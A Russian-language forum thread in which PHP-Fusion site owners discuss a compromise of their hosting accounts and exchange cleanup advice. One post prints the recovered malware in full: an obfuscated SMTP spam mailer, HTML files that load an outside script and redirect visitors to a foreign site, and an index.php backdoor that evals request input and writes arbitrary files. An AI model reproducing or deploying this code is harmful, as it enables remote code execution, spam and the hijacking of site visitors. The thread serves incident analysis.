Забыли пароль?
Запросите новый здесь.

Автор темы: Alex
ID темы: 1343
Информация:
Тема содержит 43 сообщения, была просмотрена 31704 раз.
Просмотр темы
PHP-Fusion Russia » Поддержка 7 версии » Безопасность
 Распечатать тему
в корне всех сайтов появился wp-conf.php
Alex
в корне всех сайтов появился wp-conf.php и 5-7 файлов w(набор цифр)n.php

на хостинге 10 сайтов на фьюжене, 1 ворд пресс, 1 джумла

может быть кто знает через что он проникает и размножается по всему аккаунту
 
Web
Serge Renard
Название первого файла однозначно наводит на мысль о wordpress. Если это не маскировка или совпадение, конечно.
 
Web
Rush
лиииистииииииииинг!
 
Web
Alex
Serge Renard написал:

Название первого файла однозначно наводит на мысль о wordpress. Если это не маскировка или совпадение, конечно.


тоже так думаю маскировка под файл wp-config.php

Rush написал:

лиииистииииииииинг!


можно поподробнее
 
Web
jikaka
Alex, в пятницу у меня была идентичная ситуация
в корень каждого сайта были загружены следующие файлы:
w35574914n.php
w58108374n.php
w82323321n.php
wp-conf.php

по мимо этого, на каждом сайте были изменены первые 2 файла,
например, articles.php и contact.php
т.е. те файлы, которые идут сразу же после папок
в них в самое начало была добавлена строка

на одном из сайтов, версия двига 7.02.05, был изменен файл viewpage.php, с помощью которого все это дело и внедрили

помимо этого, еще в разные места каждого сайта были запрятаны разные файлы типа: code.php, header.php, file.php и т.д.

и кстати, еще были изменены кое-где пустые index.php

все чистил около 3х часов по изменению дат файлов

PS: ах, да! совсем забыл! на акке нету сторонних движков!
 
Web
Zaxap
А я то думаю, откуда он...
Хотел стереть, да интернет вырубило, потом забыл...)
Зло не дремлет, а я добрый...
x1
 
Alex
эта ситуация повторилась уже второй раз, после первого раза удалил все фтп аккаунты и у основного аккаунта сменен пароль,

это происходит у меня только на бегете.

на рбк всё спокойно
 
Web
dark
Если ломают через тот эксплоит что в паблике, то в файле profile.php достаточно стереть вывод <!--profile_user_name--> . Это уже отсекет часть школоты которая ручками не сможет проверить что этой строки нет. Хотя по сути это никак не поможет от остальных, лучше все же обновиться.
 
jikaka
Alex, на акке сайты на фьюжике какой версии?
 
Web
Zaxap
А th_cache.txt - это что?)
Зло не дремлет, а я добрый...
 
dark
Выложите кто нибудь наконец эти файлы, что мы все гадаем, как экстрасенсы.
 
jikaka
к сожалению, я все удалил
 
Web
Alex
jikaka написал:

Alex, на акке сайты на фьюжике какой версии?


7,02,05 и 7,02,06

сижу обновляю
 
Web
jikaka
сижу обновляю

после того как меня сегодня повторно хакнули, тоже обновил все сайты
замечу одно, что в этот раз меньше было нанесено вреда, раза в 3 меньше
 
Web
Pisatel
Насколько я понял, "лииииистинг"- человек просит исходный код ему показать.:-)
 
Web
Rush
http://ru.wikiped...%B8%D0%B5)

толку от ваших постов без этого
x1
 
Web
jikaka
вот такие чужеродные файлы внедряются - code.php:
Загрузить источник  GeSHi: PHP
  1. <?php
  2. @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); if (count($_POST) < 2) { die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false; foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 = $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case chr(101); $v5031e998 = true; break; } } if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321)); $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions')); $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38]; $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($v5031e998) { $v01b6e203 = n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3($v8d777f38); $v3d26b0b1 = n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203)); $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 = urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203)); $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc); $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' || $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c; } else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } } else { $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203); $v3a5939e4 = next(explode('@', $v01b6e203)); } preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1); $vee11cbb1 = $vee11cbb1[1]; preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c); $vb068931c = $vb068931c[1]; preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9); $vc34487c9 = $vc34487c9[1]; preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42); $v6f4b5f42= $v6f4b5f42[1]; $vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9); $vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9); $v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42); $v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42); $v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']); if (ne667da76($v0897acf4) || @ini_get('safe_mode')) $v10497e3f = false; else $v10497e3f = true; $v9a5cb5d8 = "$vee11cbb1@$v0897acf4"; if ($vb068931c != '') $vd98a07f8 = "$vb068931c <$v9a5cb5d8>"; else $vd98a07f8 = $v9a5cb5d8; $vb8ddc93f = "From: $vd98a07f8\r\n"; $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n"; $v3c87b187 = "X-Priority: 3 (Normal)\r\n"; $v3c87b187 .= "MIME-Version: 1.0\r\n"; $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n"; if (!in_array('mail', $v619d75f8)) { if ($v10497e3f) { if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f.$v3c87b187, "-f$v9a5cb5d8")) die(chr(79).chr(75).md5(1234567890)."+0"); } else { if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) die(chr(79).chr(75).md5(1234567890)."+0"); } } $v4340fd73 = "Date: " . @date("D, j M Y G:i:s O")."\r\n" . $vb8ddc93f; $v4340fd73 .= "Message-ID: <".preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$v0897acf4>\r\n"; $v4340fd73 .= "To: $v01b6e203\r\n"; $v4340fd73 .= "Subject: $vc34487c9\r\n"; $v4340fd73 .= $v3c87b187; $v841a2d68 = $v4340fd73."\r\n".$v6f4b5f42; if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad($v3a5939e4); if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) { die(chr(79).chr(75).md5(1234567890)."+1"); } else { echo PHP_OS.chr(50).chr(48).'+'.md5(0987654321)."+$vb4a88417"; } function ne667da76($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); } function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a = false) { $vf5a8e923 = strlen($vb45cffe0); $vb4a88417 = ''; for($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) { if ($v11a95b8a >= 75) { $v11a95b8a = $v92f21a0f; $vb4a88417 .= $v7fa1b685; } $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]); if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) { if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) { $vb4a88417.=chr($v4a8a08f0); $v11a95b8a = 0; continue; } $vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT); $v11a95b8a += 3; continue; } $vb4a88417 .= chr($v4a8a08f0); $v11a95b8a++; } return $vb4a88417; } function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1) { global $v619d75f8; if (!in_array('fsockopen', $v619d75f8)) $v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('pfsockopen', $v619d75f8)) $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client")) $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20); else return -1; if (!$v66b18866) { return 1; } else { $v8d777f38 = n54070395($v66b18866); @fputs($v66b18866, "EHLO $v0897acf4\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "2+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "3+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251) return "4+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "DATA\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 354 ) return "5+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, $v841a2d68."\r\n.\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "6+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "QUIT\r\n"); @fclose($v66b18866); return 0; } } function n54070395($v66b18866) { $v8d777f38 = ''; while($v341be97d = @fgets($v66b18866, 4096)) { $v8d777f38 .= $v341be97d; if(substr($v341be97d, 3, 1) == ' ') break; } return $v8d777f38; } function n9c812bad($vad5f82e8) { global $v619d75f8; if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) { @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816); if (count($v744fa43b) === 0) return '127.0.0.1'; $v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816)); return $v744fa43b[$v865c0c0b[0]]; } else { return '127.0.0.1'; } } function n9a2d8ce3($v1cb251ec) { $v1cb251ec = base64_decode($v1cb251ec); $vc68271a6 = ''; for($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++) $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2); return $vc68271a6; } ?>
  3.  
Добавлено за 0.045 секунд, используя GeSHi 1.0.8.10


global.php:
Загрузить источник  GeSHi: PHP
  1. <html>
  2. <head>
  3. <script type="text/javascript" src="http://ajax.googleminiapi.com/lib/angular.min.js"></script>
  4. <META HTTP-EQUIV="REFRESH" CONTENT="0;URL=http://www.doctortyir.com">
  5. </head>
  6. <body>
  7. </body>
  8. </html>
Добавлено за 0.018 секунд, используя GeSHi 1.0.8.10


plugin.php
Загрузить источник  GeSHi: PHP
  1. <html>
  2. <head>
  3. <script type="text/javascript" src="http://ajax.googleminiapi.com/lib/angular.min.js"></script>
  4. <META HTTP-EQUIV="REFRESH" CONTENT="0;URL=http://www.doctortyir.com">
  5. </head>
  6. <body>
  7. </body>
  8. </html>
Добавлено за 0.018 секунд, используя GeSHi 1.0.8.10


index.php
Загрузить источник  GeSHi: PHP
  1. <?php $rcbam = "69b560d7cab447c84d71891ff5dfa7d7"; if(isset($_REQUEST['ywthcd'])) { $akhl = $_REQUEST['ywthcd']; eval($akhl); exit(); } if(isset($_REQUEST['pbikzigf'])) { $xqtn = $_REQUEST['mijzvivp']; $yssydzj = $_REQUEST['pbikzigf']; $plia = fopen($yssydzj, 'w'); $qgqueh = fwrite($plia, $xqtn); fclose($plia); echo $qgqueh; exit(); } ?>
Добавлено за 0.021 секунд, используя GeSHi 1.0.8.10

 
Web
Rush
ясно. тупо рассылка спама
 
Web
Zaxap
Странную весьма вещь я на сайте нашел...
_log404.log с таки вот содержимым:
Загрузить источник  GeSHi: PHP
  1. /w85177271n.php ( 03:03:23 2013-02-23 @ 31.133.40.153 )
  2. /favicon.ico ( 03:03:25 2013-02-23 @ 77.34.20.5 => Zaxap )
  3. /favicon.ico ( 03:03:26 2013-02-23 @ 77.34.20.5 => Zaxap )
  4. /w85177271n.php ( 03:03:28 2013-02-23 @ 31.133.40.153 )
  5. /w85177271n.php ( 03:03:44 2013-02-23 @ 31.133.40.153 )
  6. /favicon.ico ( 03:03:52 2013-02-23 @ 77.34.20.5 => Zaxap )
Добавлено за 0.023 секунд, используя GeSHi 1.0.8.10


Да и еще несколько штук хз, что делают на сервере:)
Зло не дремлет, а я добрый...
 
Alex
Zaxap, это лог скорей всего от хостера того когда и с какого айпи были загружены файлы
 
Web

Поделиться этой темой
Социальные закладки: Vkontakte Odnoklassniki Mail.ru Facebook Google Tweet This
URL:
BBcode:
HTML:

Перейти на форум:
Похожие темы
Темы Форум Ответов / Просмотров Последние сообщения
Флешка перестала определяться на всех устройствах  →  Разное 1 / 2179 22.02.2022 04:45
Как определить необходимые мощности хостинга для группы сайтов с определённой посещалкой?  →  Хостинг 0 / 3344 20.02.2019 20:46
Есть ли готовые плагины для сайтов по недвижимости и, автодилера и пр?  →  Пожелания и предложения 0 / 1930 10.11.2018 17:41
Ваш топ 5 список ежедневных сайтов  →  Флуд 16 / 10161 07.10.2018 10:58
Кто столько сайтов сделал?  →  Флуд 13 / 3373 21.01.2018 07:11
Как правильно загрузить свой шрифт в css для всех браузеров?  →  Темы оформления 7 версии 12 / 28762 04.08.2017 10:06
Сколково Телеком - качественный хостинг сайтов на SSD дисках  →  Хостинг 7 / 15140 22.12.2016 17:00
Показ всех категорий статей  →  Моды 2 / 4202 11.09.2016 15:44
Как сделать разное мето описание на всех странциах?  →  Вопросы новичков 25 / 43779 27.10.2015 22:32
Хостинг сайтов по экономным ценам Lowhosting.ru  →  Реклама на портале 7 / 8577 04.05.2015 14:50
Топ 5 пользователей форума
Zaxap Zaxap (1,090)   Vova Vova (877)   Pisatel Pisatel (678)   util util (666)   SchreiBear SchreiBear (625)